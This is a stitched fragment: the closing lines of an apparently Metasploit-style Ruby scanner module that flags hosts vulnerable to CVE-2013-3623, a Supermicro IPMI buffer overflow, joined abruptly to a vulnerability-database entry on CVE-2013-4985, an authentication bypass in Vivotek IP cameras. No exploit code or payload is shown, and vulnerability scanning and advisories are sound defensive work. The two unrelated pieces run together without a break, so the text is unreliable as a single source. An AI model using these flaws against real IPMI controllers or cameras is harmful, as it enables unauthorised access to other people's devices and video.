      print_good("Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)")
      report_vuln({
        :host  => rhost,
        :port  => rport,
        :proto => 'tcp',
        :name  => "Supermicro Onboard IPMI close_window.cgi Buffer Overflow",
        :refs  => self.references.select { |ref| ref.ctx_val == "2013-3623" }
      })
    end
  end
end
VAR-201912-1601 CVE-2013-4985 Vivotek IP Camera authentication bypass vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Multiple Vivotek IP Cameras are affected by a remote authentication bypass that could allow access to the video stream. Vivotek IP Cameras contain an improper authentication vulnerability. Information may be obtained. Vivotek IP cameras are webcam devices. An attacker can exploit this issue to bypass the authentication mechanism and gain unauthorized access to the restricted functionality of the device